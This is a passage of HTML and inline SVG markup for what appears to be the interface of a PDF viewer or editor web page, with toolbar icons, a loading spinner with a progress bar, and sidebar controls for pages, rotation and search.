                    <path d="M18.3623 24.7902C18.19 24.7774 18.022 24.7301 17.8683 24.6511C17.7146 24.572 17.5784 24.4629 17.4678 24.3302L15.3691 22.2306C15.2418 22.116 15.1382 21.9774 15.0645 21.8227C14.9908 21.668 14.9483 21.5003 14.9395 21.3292C14.9405 21.187 14.9702 21.0464 15.027 20.9159C15.0837 20.7854 15.1662 20.6678 15.2695 20.57L24.4688 11.3702C24.6973 11.1367 25.0092 11.0036 25.3358 11.0001C25.6625 10.9965 25.9772 11.1229 26.2107 11.3514L26.2295 11.3702L28.3291 13.4703C28.5624 13.6987 28.6955 14.0103 28.6991 14.3368C28.7027 14.6632 28.5764 14.9777 28.3481 15.2111L28.3281 15.2311L19.1289 24.4308C19.0319 24.5392 18.914 24.6269 18.7823 24.6887C18.6505 24.7504 18.5077 24.7849 18.3623 24.7902ZM16.6113 21.3483L18.3486 23.089L27.0879 14.3502L25.3486 12.611L16.6113 21.3483Z" fill="#B9B9B9"/>
                    <path d="M33.7492 28C33.7162 27.9999 33.6836 28.0064 33.6531 28.0189C33.6226 28.0315 33.5949 28.05 33.5716 28.0732L28.0737 33.5716C28.0385 33.6067 28.0146 33.6514 28.0048 33.7001C27.9951 33.7488 28.0001 33.7993 28.0191 33.8452C28.0381 33.8911 28.0704 33.9303 28.1117 33.9579C28.153 33.9854 28.2016 34.0001 28.2513 34H33.7492C33.8157 34 33.8795 33.9736 33.9265 33.9265C33.9736 33.8795 34 33.8157 34 33.7492V28.2508C34 28.1843 33.9736 28.1205 33.9265 28.0735C33.8795 28.0264 33.8157 28 33.7492 28Z" fill="#B9B9B9"/>
                    </svg>                
            </div>
            <div>
                <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M20.8135 26.0126C15.0574 26.0126 11.7334 23.1018 11.512 20.2532C11.3211 17.8003 13.3797 14.908 19.727 14.1452C23.775 13.6615 26.7439 14.3984 27.8811 16.1725C28.1701 16.6167 28.323 17.1356 28.3211 17.6655C28.3191 18.1954 28.1623 18.7132 27.8701 19.1552C27.015 20.5512 24.7555 21.9055 20.9465 21.6502C20.8839 21.6453 20.8227 21.6281 20.7667 21.5996C20.7107 21.5711 20.6608 21.5318 20.6199 21.484C20.5791 21.4362 20.548 21.3808 20.5286 21.321C20.5091 21.2612 20.5016 21.1981 20.5065 21.1355L20.5072 21.1278L20.554 20.6576C20.568 20.5353 20.6289 20.4233 20.7239 20.345C20.8189 20.2668 20.9406 20.2285 21.0633 20.2382C24.2396 20.4437 26.0553 19.4059 26.6628 18.4151C26.813 18.199 26.8956 17.9431 26.9002 17.68C26.9048 17.4169 26.8311 17.1583 26.6886 16.9371C26.055 15.9488 23.9364 15.0661 19.8967 15.5518C15.4853 16.0816 12.7488 17.8843 12.9241 20.1435C13.1048 22.4686 16.2997 24.7569 21.3881 24.5858C22.1116 24.5706 22.8334 24.5085 23.5489 24.3999C23.6676 24.3766 23.7907 24.3995 23.8931 24.4639C23.9955 24.5282 24.0695 24.6293 24.1 24.7463L24.2151 25.2048C24.2469 25.3249 24.2297 25.4529 24.1673 25.5603C24.1048 25.6678 24.0023 25.7461 23.8821 25.778L23.8557 25.7842C23.0557 25.912 22.2478 25.9847 21.4379 26.0015C21.2267 26.0089 21.0192 26.0126 20.8135 26.0126Z" fill="#B9B9B9"/>
                    </svg>                
            </div>
            <div>
                <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M18.3894 20.9638L17.6463 23.1914C17.6374 23.2235 17.6179 23.2518 17.591 23.2715C17.564 23.2911 17.5312 23.3011 17.4978 23.2998H16.1482C16.076 23.2998 16.0447 23.2548 16.0545 23.165L18.8348 15.2539C18.8636 15.1747 18.8861 15.0934 18.9022 15.0107C18.9197 14.9209 18.9383 14.7587 18.9569 14.5244C18.9569 14.4619 18.9832 14.4306 19.0369 14.4306H20.9138C20.9254 14.4294 20.9371 14.4306 20.9481 14.4341C20.9592 14.4376 20.9695 14.4433 20.9782 14.4509C20.987 14.4585 20.9942 14.4678 20.9992 14.4783C21.0043 14.4887 21.0071 14.5001 21.0076 14.5117L24.1267 23.1787C24.1355 23.2597 24.1092 23.2998 24.0457 23.2998H22.534C22.5058 23.3014 22.4779 23.2945 22.4537 23.2801C22.4295 23.2656 22.4102 23.2443 22.3982 23.2188L21.616 20.9639L18.3894 20.9638ZM21.1834 19.4931C21.1111 19.2675 20.3601 16.9638 20.2517 16.6308C20.1443 16.2978 20.0584 16.0146 19.9959 15.7802H19.9822C19.9285 16.0058 19.8562 16.2685 19.7664 16.5702C19.6756 16.872 18.9197 19.1864 18.8211 19.4931L21.1834 19.4931Z" fill="#B9B9B9"/>
                    <path d="M13.5 11H11V12.5H13.5V11Z" fill="#B9B9B9"/>
                    <path d="M17.5 11H15V12.5H17.5V11Z" fill="#B9B9B9"/>
                    <path d="M13.5 26H11V27.5H13.5V26Z" fill="#B9B9B9"/>
                    <path d="M21.5 11H19V12.5H21.5V11Z" fill="#B9B9B9"/>
                    <path d="M25.5 11H23V12.5H25.5V11Z" fill="#B9B9B9"/>
                    <path d="M29 11H27V12.5H29V11Z" fill="#B9B9B9"/>
                    <path d="M17.5 26H15V27.5H17.5V26Z" fill="#B9B9B9"/>
                    <path d="M21.5 26H19V27.5H21.5V26Z" fill="#B9B9B9"/>
                    <path d="M25.5 26H23V27.5H25.5V26Z" fill="#B9B9B9"/>
                    <path d="M29 26H27V27.5H29V26Z" fill="#B9B9B9"/>
                    <path d="M12.5 14H11V16.5H12.5V14Z" fill="#B9B9B9"/>
                    <path d="M12.5 18H11V20.5H12.5V18Z" fill="#B9B9B9"/>
                    <path d="M12.5 22H11V24.5H12.5V22Z" fill="#B9B9B9"/>
                    <path d="M29 14H27.5V16.5H29V14Z" fill="#B9B9B9"/>
                    <path d="M29 18H27.5V20.5H29V18Z" fill="#B9B9B9"/>
                    <path d="M29 22H27.5V24.5H29V22Z" fill="#B9B9B9"/>
                    <path d="M33.7492 28C33.7162 27.9999 33.6836 28.0064 33.6531 28.0189C33.6226 28.0315 33.5949 28.05 33.5716 28.0732L28.0737 33.5716C28.0385 33.6067 28.0146 33.6514 28.0048 33.7001C27.9951 33.7488 28.0001 33.7993 28.0191 33.8452C28.0381 33.8911 28.0704 33.9303 28.1117 33.9579C28.153 33.9854 28.2016 34.0001 28.2513 34H33.7492C33.8157 34 33.8795 33.9736 33.9265 33.9265C33.9736 33.8795 34 33.8157 34 33.7492V28.2508C34 28.1843 33.9736 28.1205 33.9265 28.0735C33.8795 28.0264 33.8157 28 33.7492 28Z" fill="#B9B9B9"/>
                    </svg>                
            </div>
            <div>
                <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_2430_846)">
                    <path d="M26.4438 15.7521L22.8754 12.1823C22.5966 11.9194 22.2281 11.7727 21.8449 11.772C21.4618 11.7712 21.0927 11.9166 20.8129 12.1783L18.9613 14.0211L14.9369 15.9523C14.4532 16.2213 14.0802 16.6529 13.8842 17.1705L11.2319 24.7545C11.1249 25.021 11.099 25.3132 11.1574 25.5943C11.2158 25.8755 11.3558 26.1331 11.56 26.3351L12.2026 26.9581C12.4783 27.2314 12.8504 27.3854 13.2387 27.3868C13.4108 27.3872 13.5814 27.3551 13.7416 27.2921L21.4164 24.6471C21.967 24.4315 22.4198 24.0222 22.6898 23.4962L24.6088 19.6359L26.4379 17.8185C26.574 17.6852 26.6825 17.5265 26.7572 17.3514C26.8319 17.1762 26.8714 16.988 26.8734 16.7976C26.8754 16.6072 26.8398 16.4182 26.7688 16.2415C26.6978 16.0649 26.5926 15.9039 26.4594 15.7678L26.4438 15.7521ZM21.352 22.8165C21.2558 23.0064 21.0957 23.1562 20.8998 23.2394L14.1811 25.5658L17.6408 21.9507C17.6711 21.9529 17.6968 21.9682 17.7276 21.9682C17.9649 21.9682 18.1969 21.8978 18.3942 21.7659C18.5916 21.6341 18.7454 21.4466 18.8362 21.2274C18.927 21.0081 18.9507 20.7668 18.9044 20.5341C18.8581 20.3013 18.7438 20.0875 18.576 19.9197C18.4082 19.7518 18.1944 19.6376 17.9616 19.5913C17.7288 19.545 17.4875 19.5687 17.2683 19.6596C17.049 19.7504 16.8616 19.9042 16.7297 20.1015C16.5979 20.2989 16.5275 20.5309 16.5275 20.7682C16.5341 20.8172 16.544 20.8657 16.5569 20.9135L12.7858 24.8538L15.2914 17.6896C15.3546 17.522 15.4713 17.3799 15.6234 17.2853L19.724 15.3185L19.7998 15.2445L23.3827 18.8193L21.352 22.8165ZM24.4064 17.7227L20.8727 14.1972L21.8324 13.2604L25.3851 16.7501L24.4064 17.7227Z" fill="#B9B9B9"/>
                    <path d="M25.3329 21.9056C25.4497 21.7454 25.612 21.624 25.7987 21.5574C25.9855 21.4908 26.1879 21.4819 26.3798 21.532C26.5716 21.5822 26.7439 21.6889 26.8742 21.8384C27.0044 21.9879 27.0867 22.1731 27.1101 22.37L27.1053 22.6127L26.5893 25.6049L27.6065 24.6575L27.78 24.4775C27.872 24.382 27.9982 24.327 28.1308 24.3246C28.2634 24.3222 28.3915 24.3725 28.487 24.4645L28.8469 24.8115C28.8942 24.8571 28.932 24.9115 28.9582 24.9717C28.9845 25.0319 28.9986 25.0967 28.9998 25.1623C29.001 25.228 28.9893 25.2932 28.9653 25.3544C28.9413 25.4155 28.9054 25.4713 28.8599 25.5185L28.6864 25.6985C28.0531 26.4612 27.2515 27.0665 26.3446 27.4666C25.6209 27.6902 24.8466 27.3346 24.8986 26.6174L25.0534 25.6858L24.994 25.7694C24.6956 26.1733 24.344 26.5349 23.9487 26.8445L23.7179 27.0091C23.2574 27.2662 22.7595 27.4499 22.2423 27.5534L22.0152 27.5957L21.7684 27.636C21.7036 27.6465 21.6374 27.6443 21.5735 27.6292C21.5095 27.6142 21.4492 27.5867 21.3959 27.5484C21.3426 27.51 21.2974 27.4615 21.2628 27.4057C21.2282 27.3499 21.205 27.2878 21.1944 27.223L21.1139 26.7295C21.1034 26.6647 21.1057 26.5984 21.1207 26.5345C21.1357 26.4706 21.1632 26.4103 21.2016 26.357C21.2399 26.3036 21.2884 26.2584 21.3442 26.2239C21.4 26.1893 21.4621 26.1661 21.5269 26.1555L21.7737 26.1152C22.173 26.0522 22.5596 25.9255 22.9188 25.7401C23.4732 25.3182 23.931 24.7826 24.2616 24.1693C24.53 23.714 24.7673 23.241 24.9717 22.7536C25.077 22.4648 25.1976 22.1817 25.3329 21.9056Z" fill="#B9B9B9"/>
                    </g>
                    <path d="M33.7492 28C33.7162 27.9999 33.6836 28.0064 33.6531 28.0189C33.6226 28.0315 33.5949 28.05 33.5716 28.0732L28.0737 33.5716C28.0385 33.6067 28.0146 33.6514 28.0048 33.7001C27.9951 33.7488 28.0001 33.7993 28.0191 33.8452C28.0381 33.8911 28.0704 33.9303 28.1117 33.9579C28.153 33.9854 28.2016 34.0001 28.2513 34H33.7492C33.8157 34 33.8795 33.9736 33.9265 33.9265C33.9736 33.8795 34 33.8157 34 33.7492V28.2508C34 28.1843 33.9736 28.1205 33.9265 28.0735C33.8795 28.0264 33.8157 28 33.7492 28Z" fill="#B9B9B9"/>
                    <defs>
                    <clipPath id="clip0_2430_846">
                    <rect width="18" height="18" fill="white" transform="translate(11 11)"/>
                    </clipPath>
                    </defs>
                    </svg>
                    
            </div>
        </div>
        <div class="w-full flex-1 flex justify-center items-center" id="body">
            <div class="flex flex-col items-center space-y-6 loader">
                <div>
                    <svg width="60" height="60" viewBox="0 0 60 60" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <g clip-path="url(#clip0_2439_122)">
                        <path d="M58.9948 38.4185C57.2173 36.5248 53.5855 35.4298 48.4386 35.4298C45.6842 35.4298 42.5005 35.7035 39.0336 36.3485C36.9147 34.2587 34.9864 31.9841 33.2717 29.5516C31.9442 27.7066 30.7817 25.7529 29.7167 23.8291C31.7473 17.4823 32.7336 12.3054 32.7336 8.57602C32.7336 4.39664 31.2205 0.0410156 26.8836 0.0410156C25.5448 0.0410156 24.2173 0.851016 23.5048 2.04352C21.5511 5.55914 22.4305 13.2748 25.7998 20.891C24.5147 24.7762 23.0976 28.6166 21.5511 32.4054C20.0869 35.8811 18.4806 39.2953 16.7361 42.6391C6.98046 46.6048 0.661708 51.2229 0.0767078 54.8566C-0.187667 56.2235 0.262333 57.4741 1.21858 58.4791C1.55046 58.7529 2.80108 59.8366 4.91983 59.8366C11.3942 59.8366 18.2117 49.1435 21.688 42.6879C24.3448 41.7898 27.0111 40.9685 29.6661 40.1491C32.4718 39.3744 35.314 38.7386 38.1823 38.2441C45.0186 44.5048 51.043 45.491 54.0711 45.491C57.8023 45.491 59.1298 43.9479 59.5798 42.6879C60.283 41.0566 59.7561 39.2604 58.9555 38.3323L59.0042 38.4298L58.9948 38.4185ZM55.5373 41.0548C55.273 42.4123 53.9361 43.3198 52.0705 43.3198C51.5436 43.3198 51.0936 43.2223 50.5573 43.1435C47.158 42.3223 43.9761 40.5954 40.8017 37.8691C43.264 37.4557 45.7562 37.2469 48.253 37.2448C50.098 37.2448 51.7011 37.3329 52.7736 37.6066C54.0036 37.871 55.9573 38.6998 55.5186 41.0641H55.5673L55.5373 41.0548ZM36.7292 36.7873C34.2585 37.2916 31.8031 37.8681 29.3661 38.516C27.2463 39.0918 25.1458 39.7365 23.068 40.4491C24.1468 38.3126 25.153 36.1401 26.0848 33.9354C27.1592 31.3873 28.0386 28.7604 28.9273 26.3173C29.7973 27.851 30.7723 29.3941 31.7492 30.7704C33.3505 32.9473 35.0211 35.0191 36.7011 36.8248V36.776L36.7292 36.7873ZM25.0967 3.07664C25.2531 2.75669 25.494 2.48566 25.7935 2.29296C26.093 2.10026 26.4395 1.99324 26.7955 1.98352C28.6611 1.98352 29.0117 4.15102 29.0117 5.88914C29.0117 8.80852 28.123 13.2429 26.6098 18.3016C23.953 11.2516 23.7786 5.35289 25.1061 3.07664H25.0967ZM15.3411 45.3223C10.8205 52.9291 6.47421 57.6466 3.80796 57.6466C3.29046 57.6466 2.84046 57.461 2.48983 57.1966C1.95358 56.6491 1.68921 56.0154 1.86546 55.2916C2.40171 52.5673 7.46046 48.7591 15.3523 45.3204L15.3411 45.3223Z" fill="#B9B9B9" fill-opacity="0.3"/>
                        </g>
                        <defs>
                        <clipPath id="clip0_2439_122">
                        <rect width="60" height="60" fill="white"/>
                        </clipPath>
                        </defs>
                        </svg>
                        
                </div>
                <div>
                    <div class="progress">
                        <div class="progress-value"></div>
                      </div>
                </div>
            </div>

            <div id="loaded" style="display: none;">
                <img src="./bg.svg" alt="">
            </div>

        </div>
        <div class="bg-[#323232] flex flex-col p-[6px] justify-between" style="height: calc(100vh - 64px) !important;">
            <div>
                <div>
                    <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <g clip-path="url(#clip0_2430_918)">
                        <path d="M28.37 14.738L28.369 14.737C28.1759 14.5355 27.9429 14.3764 27.6849 14.27C27.4268 14.1635 27.1495 14.112 26.8704 14.1187H26.6057L26.6076 15.6781H26.8789C27.0317 15.6825 27.1776 15.7424 27.2893 15.8467C27.3996 15.9577 27.4622 16.1074 27.4637 16.2639L27.4562 23.5543C27.4569 23.7102 27.3961 23.8602 27.2868 23.9715C27.1701 24.07 27.0252 24.129 26.8729 24.1401H24.0588L24.0513 24.1423V26.7431L21.3088 24.399H20.073L18.5527 25.6985H20.4449L24.0128 28.7482C24.1882 28.911 24.4189 29.001 24.6581 29H24.6801C24.9256 28.9893 25.1573 28.8837 25.3265 28.7055C25.4956 28.5273 25.589 28.2903 25.5868 28.0446V25.6994H26.8644C27.4257 25.68 27.9609 25.4582 28.3714 25.0751C28.7703 24.6683 28.9931 24.1209 28.9918 23.5512L28.9993 16.2619C28.9959 15.6914 28.7701 15.1447 28.37 14.738Z" fill="#B9B9B9"/>
                        <path d="M15.2137 25.8812H15.1932C14.9446 25.8716 14.7095 25.7649 14.5386 25.584C14.3676 25.4032 14.2742 25.1626 14.2785 24.9137V22.5807H13.1194C12.8402 22.5823 12.5636 22.5277 12.3059 22.4203C12.0482 22.3129 11.8148 22.1547 11.6194 21.9553C11.2206 21.5474 10.9981 20.999 11 20.4284L11.0155 13.1442C11.0187 12.5733 11.2445 12.0262 11.6448 11.6193L11.6458 11.6183C12.0571 11.237 12.5924 11.0174 13.1529 11H22.7149C22.9906 11.0005 23.2634 11.0562 23.5173 11.1637C23.7711 11.2713 24.0009 11.4286 24.1929 11.6264C24.5915 12.0339 24.8143 12.5813 24.8138 13.1513L24.8228 20.4325C24.8269 21.0009 24.6069 21.548 24.2104 21.9553C24.0171 22.1522 23.7867 22.3087 23.5325 22.4159C23.2783 22.5231 23.0053 22.5788 22.7294 22.5797H19.42L15.8296 25.6497C15.6601 25.8006 15.4406 25.8831 15.2137 25.8812ZM14.8534 24.4467C14.8414 24.4558 14.8294 24.466 14.8179 24.4761L14.8534 24.4467ZM15.0463 21.0213H15.814V23.6244L18.8601 21.0203H22.7149C22.7915 21.0311 22.8695 21.0215 22.9412 20.9925C23.0128 20.9634 23.0755 20.9159 23.1228 20.8548C23.2298 20.7444 23.2888 20.5963 23.2873 20.4426L23.2783 13.1502C23.2791 12.9937 23.2182 12.843 23.1088 12.731C22.9984 12.6385 22.8641 12.579 22.7214 12.5594H13.1444C13.0664 12.5581 12.989 12.5725 12.9167 12.6017C12.8443 12.6308 12.7786 12.6742 12.7233 12.7292C12.668 12.7841 12.6243 12.8496 12.5947 12.9218C12.5651 12.9939 12.5503 13.0713 12.5511 13.1492L12.5356 20.4335C12.5346 20.5896 12.5951 20.7399 12.704 20.8518C12.7554 20.908 12.8184 20.9523 12.8887 20.9816C12.959 21.0108 13.0348 21.0244 13.1109 21.0213H15.0463Z" fill="#B9B9B9"/>
                        </g>
                        <defs>
                        <clipPath id="clip0_2430_918">
                        <rect width="18" height="18" fill="white" transform="translate(11 11)"/>
                        </clipPath>
                        </defs>
                        </svg>                
                </div>
                <div>
                    <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M17.5 17.5H14.5V14.5H17.5V17.5ZM18.5 13H13.5C13.3674 13 13.2402 13.0527 13.1464 13.1464C13.0527 13.2402 13 13.3674 13 13.5V18.5C13 18.6326 13.0527 18.7598 13.1464 18.8536C13.2402 18.9473 13.3674 19 13.5 19H18.5C18.6326 19 18.7598 18.9473 18.8536 18.8536C18.9473 18.7598 19 18.6326 19 18.5V13.5C19 13.3674 18.9473 13.2402 18.8536 13.1464C18.7598 13.0527 18.6326 13 18.5 13Z" fill="#B9B9B9"/>
                        <path d="M25.5 17.5H22.5V14.5H25.5V17.5ZM26.5 13H21.5C21.3674 13 21.2402 13.0527 21.1464 13.1464C21.0527 13.2402 21 13.3674 21 13.5V18.5C21 18.6326 21.0527 18.7598 21.1464 18.8536C21.2402 18.9473 21.3674 19 21.5 19H26.5C26.6326 19 26.7598 18.9473 26.8536 18.8536C26.9473 18.7598 27 18.6326 27 18.5V13.5C27 13.3674 26.9473 13.2402 26.8536 13.1464C26.7598 13.0527 26.6326 13 26.5 13Z" fill="#B9B9B9"/>
                        <path d="M17.5 25.5H14.5V22.5H17.5V25.5ZM18.5 21H13.5C13.3674 21 13.2402 21.0527 13.1464 21.1464C13.0527 21.2402 13 21.3674 13 21.5V26.5C13 26.6326 13.0527 26.7598 13.1464 26.8536C13.2402 26.9473 13.3674 27 13.5 27H18.5C18.6326 27 18.7598 26.9473 18.8536 26.8536C18.9473 26.7598 19 26.6326 19 26.5V21.5C19 21.3674 18.9473 21.2402 18.8536 21.1464C18.7598 21.0527 18.6326 21 18.5 21Z" fill="#B9B9B9"/>
                        <path d="M25.5 25.5H22.5V22.5H25.5V25.5ZM26.5 21H21.5C21.3674 21 21.2402 21.0527 21.1464 21.1464C21.0527 21.2402 21 21.3674 21 21.5V26.5C21 26.6326 21.0527 26.7598 21.1464 26.8536C21.2402 26.9473 21.3674 27 21.5 27H26.5C26.6326 27 26.7598 26.9473 26.8536 26.8536C26.9473 26.7598 27 26.6326 27 26.5V21.5C27 21.3674 26.9473 21.2402 26.8536 21.1464C26.7598 21.0527 26.6326 21 26.5 21Z" fill="#B9B9B9"/>
                        </svg>
                        
                </div>
            </div>
            <div>
                <svg width="40" height="348" viewBox="0 0 40 348" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <rect x="35.5" y="35.5" width="31" height="31" rx="1.5" transform="rotate(-180 35.5 35.5)" stroke="#B9B9B9"/>
                    <path d="M21.1506 14.2727V23H19.8295V15.5938H19.7784L17.6903 16.9574V15.696L19.8679 14.2727H21.1506Z" fill="white"/>
                    <g clip-path="url(#clip0_2430_994)">
                    <path d="M16.7305 62.2955V61.2301L20.5018 55.2727H21.3413V56.8409H20.8086L18.1112 61.1108V61.179H23.2802V62.2955H16.7305ZM20.8683 64V61.9716L20.8768 61.4858V55.2727H22.1254V64H20.8683Z" fill="white"/>
                    </g>
                    <path d="M20.0006 97.5001C19.902 97.5 19.8044 97.5193 19.7133 97.5571C19.6223 97.5949 19.5396 97.6502 19.47 97.7201C18.864 98.2973 17.5006 99.758 16.2306 100.96C16.0899 101.1 16.0109 101.291 16.0109 101.49C16.0109 101.689 16.0899 101.879 16.2306 102.02C16.3712 102.161 16.562 102.24 16.7609 102.24C16.9598 102.24 17.1505 102.161 17.2912 102.02L20.0006 99.3106L22.71 102.02C22.8506 102.161 23.0414 102.24 23.2403 102.24C23.4392 102.24 23.6299 102.161 23.7706 102.02C23.9112 101.879 23.9902 101.689 23.9902 101.49C23.9902 101.291 23.9112 101.1 23.7706 100.96L20.5312 97.7201C20.4616 97.6502 20.3789 97.5949 20.2878 97.5571C20.1968 97.5193 20.0992 97.5 20.0006 97.5001Z" fill="#B9B9B9" fill-opacity="0.3"/>
                    <path d="M19.9994 142.5C20.098 142.5 20.1956 142.481 20.2867 142.443C20.3777 142.405 20.4604 142.35 20.53 142.28C21.136 141.703 22.4994 140.242 23.7694 139.04C23.9101 138.9 23.9891 138.709 23.9891 138.51C23.9891 138.311 23.9101 138.121 23.7694 137.98C23.6288 137.839 23.438 137.76 23.2391 137.76C23.0402 137.76 22.8495 137.839 22.7088 137.98L19.9994 140.689L17.29 137.98C17.1494 137.839 16.9586 137.76 16.7597 137.76C16.5608 137.76 16.3701 137.839 16.2294 137.98C16.0888 138.121 16.0098 138.311 16.0098 138.51C16.0098 138.709 16.0888 138.9 16.2294 139.04L19.4688 142.28C19.5384 142.35 19.6211 142.405 19.7122 142.443C19.8032 142.481 19.9008 142.5 19.9994 142.5Z" fill="#B9B9B9" fill-opacity="0.3"/>
                    <g clip-path="url(#clip1_2430_994)">
                    <line x1="8" y1="166.5" x2="32" y2="166.5" stroke="#CDCDCD" stroke-opacity="0.4"/>
                    </g>
                    <path d="M18.5811 187.172C19.9799 186.869 21.4351 186.962 22.7843 187.439C24.1335 187.916 25.3234 188.759 26.2211 189.874L26.2863 187.884C26.2906 187.751 26.3474 187.626 26.4442 187.535C26.5409 187.444 26.6698 187.396 26.8023 187.4L27.3028 187.417C27.4354 187.421 27.5607 187.478 27.6514 187.574C27.7421 187.671 27.7906 187.8 27.7863 187.933L27.6376 192.476C27.6355 192.541 27.6204 192.606 27.5933 192.666C27.5662 192.725 27.5276 192.779 27.4797 192.824C27.4318 192.869 27.3755 192.904 27.314 192.927C27.2526 192.95 27.1872 192.961 27.1216 192.959L27.0846 192.956L22.5645 192.471C22.4992 192.464 22.4359 192.445 22.3783 192.413C22.3207 192.382 22.2698 192.339 22.2286 192.288C22.1874 192.237 22.1566 192.178 22.1381 192.115C22.1196 192.052 22.1137 191.986 22.1207 191.921L22.174 191.424C22.1882 191.292 22.2541 191.171 22.3574 191.088C22.4606 191.005 22.5926 190.966 22.7245 190.98L25.3939 191.266C24.6417 190.153 23.5505 189.313 22.2824 188.87C21.0143 188.427 19.6371 188.405 18.3555 188.807C17.0739 189.21 15.9564 190.015 15.169 191.103C14.3817 192.191 13.9665 193.505 13.9853 194.848C14.0041 196.191 14.4558 197.492 15.2733 198.558C16.0908 199.624 17.2305 200.397 18.5228 200.764C19.8151 201.13 21.1912 201.069 22.4464 200.591C23.7016 200.113 24.7689 199.242 25.4897 198.109C25.5239 198.052 25.569 198.002 25.6224 197.962C25.6758 197.923 25.7365 197.894 25.801 197.878C25.8655 197.862 25.9325 197.859 25.9983 197.868C26.064 197.878 26.1272 197.901 26.1842 197.935L26.2079 197.95L26.614 198.235C26.7197 198.307 26.7936 198.418 26.8204 198.543C26.8472 198.669 26.825 198.8 26.7583 198.91C26.0727 199.986 25.132 200.877 24.0195 201.502C22.9071 202.128 21.6574 202.469 20.3814 202.495C19.1055 202.522 17.8428 202.233 16.7054 201.654C15.568 201.075 14.5912 200.224 13.8617 199.177C13.1322 198.13 12.6726 196.918 12.5236 195.651C12.3747 194.383 12.5411 193.099 13.008 191.911C13.475 190.723 14.228 189.669 15.2002 188.842C16.1724 188.016 17.3338 187.442 18.5811 187.172Z" fill="#B9B9B9"/>
                    <path d="M26.4222 228.139L23.9021 225.583C23.5309 225.211 23.0277 225.002 22.5025 225H15.2088C14.619 225.01 14.057 225.252 13.6438 225.673C13.2306 226.094 12.9994 226.66 13 227.25V239.747C12.9993 240.339 13.2318 240.907 13.6472 241.329C14.0627 241.751 14.6275 241.992 15.2195 242H24.7903C25.3801 241.99 25.9423 241.748 26.3556 241.327C26.769 240.906 27.0004 240.34 27 239.75V229.552C27.0018 229.29 26.9517 229.03 26.8525 228.788C26.7534 228.545 26.6071 228.325 26.4222 228.139ZM22.4957 226.5C22.6222 226.504 22.7432 226.553 22.8363 226.639L25.3564 229.195C25.4392 229.281 25.488 229.393 25.4937 229.513H22.4957V226.5ZM24.7795 240.5H15.2302C15.0342 240.496 14.8476 240.415 14.7108 240.275C14.574 240.135 14.498 239.946 14.4992 239.75V227.247C14.4982 227.053 14.5729 226.866 14.7075 226.727C14.842 226.587 15.0258 226.506 15.2195 226.5H20.9965V230.263C20.9965 230.461 21.0755 230.652 21.216 230.793C21.3566 230.933 21.5473 231.012 21.7461 231.013H25.5008V239.753C25.5018 239.947 25.427 240.134 25.2922 240.274C25.1574 240.413 24.9734 240.494 24.7795 240.5Z" fill="#B9B9B9"/>
                    <path d="M22.6092 235.974L22.1104 235.955C21.9779 235.95 21.8528 235.893 21.7626 235.796C21.6724 235.699 21.6245 235.57 21.6294 235.437L21.6909 233.786L20.0472 233.851C19.9816 233.854 19.9161 233.844 19.8545 233.821C19.7929 233.798 19.7364 233.764 19.6881 233.719C19.6399 233.675 19.6009 233.621 19.5734 233.561C19.5459 233.502 19.5304 233.437 19.5278 233.372L19.5082 232.872C19.503 232.739 19.5507 232.61 19.6407 232.513C19.7306 232.415 19.8556 232.358 19.9881 232.352L22.7099 232.245C22.8424 232.24 22.9716 232.287 23.069 232.377C23.1664 232.467 23.224 232.592 23.2292 232.725C23.2297 232.738 23.2297 232.75 23.2292 232.763L23.1274 235.493C23.1224 235.625 23.0651 235.75 22.9679 235.841C22.8707 235.931 22.7417 235.979 22.6092 235.974Z" fill="#B9B9B9"/>
                    <path d="M16.641 238.315L16.7477 235.592C16.7529 235.46 16.8105 235.335 16.9079 235.245C17.0053 235.155 17.1344 235.107 17.2669 235.112L17.7659 235.132C17.8984 235.137 18.0234 235.194 18.1134 235.292C18.2034 235.389 18.2511 235.518 18.246 235.651L18.1824 237.296L19.8321 237.234C19.9646 237.229 20.0936 237.277 20.1908 237.367C20.288 237.458 20.3454 237.583 20.3503 237.715L20.3689 238.215C20.3738 238.347 20.3259 238.476 20.2357 238.574C20.1454 238.671 20.0203 238.728 19.8878 238.733L17.1592 238.834C17.0267 238.839 16.8976 238.791 16.8004 238.701C16.7033 238.611 16.6459 238.486 16.641 238.353C16.6405 238.341 16.6405 238.328 16.641 238.315Z" fill="#B9B9B9"/>
                    <path d="M33.7492 242C33.7162 242 33.6836 242.006 33.6531 242.019C33.6226 242.032 33.5949 242.05 33.5716 242.073L28.0737 247.572C28.0385 247.607 28.0146 247.651 28.0048 247.7C27.9951 247.749 28.0001 247.799 28.0191 247.845C28.0381 247.891 28.0704 247.93 28.1117 247.958C28.153 247.985 28.2016 248 28.2513 248H33.7492C33.8157 248 33.8795 247.974 33.9265 247.927C33.9736 247.879 34 247.816 34 247.749V242.251C34 242.184 33.9736 242.121 33.9265 242.073C33.8795 242.026 33.8157 242 33.7492 242Z" fill="#B9B9B9"/>
                    <g clip-path="url(#clip2_2430_994)">
                    <line x1="8" y1="260.5" x2="32" y2="260.5" stroke="#CDCDCD" stroke-opacity="0.4"/>
                    </g>
                    <path d="M28.2474 295.186L23.9125 290.851C24.8984 289.595 25.3675 288.01 25.224 286.42C25.0806 284.829 24.3353 283.353 23.1404 282.294C21.9456 281.235 20.3914 280.671 18.7952 280.719C17.199 280.767 15.6813 281.422 14.5522 282.552C13.423 283.681 12.7675 285.199 12.7196 286.795C12.6717 288.391 13.235 289.945 14.2945 291.14C15.354 292.335 16.8296 293.08 18.4201 293.224C20.0105 293.367 21.5957 292.898 22.8519 291.912L27.1869 296.247C27.2807 296.341 27.4078 296.393 27.5405 296.393C27.6731 296.393 27.8002 296.341 27.894 296.247L28.2474 295.893C28.3412 295.8 28.3939 295.672 28.3938 295.54C28.3938 295.407 28.3411 295.28 28.2474 295.186ZM19.0004 291.75C18.0609 291.75 17.1426 291.471 16.3614 290.949C15.5803 290.427 14.9715 289.686 14.6119 288.818C14.2524 287.95 14.1584 286.995 14.3416 286.073C14.5249 285.152 14.9773 284.305 15.6416 283.641C16.3059 282.977 17.1523 282.524 18.0737 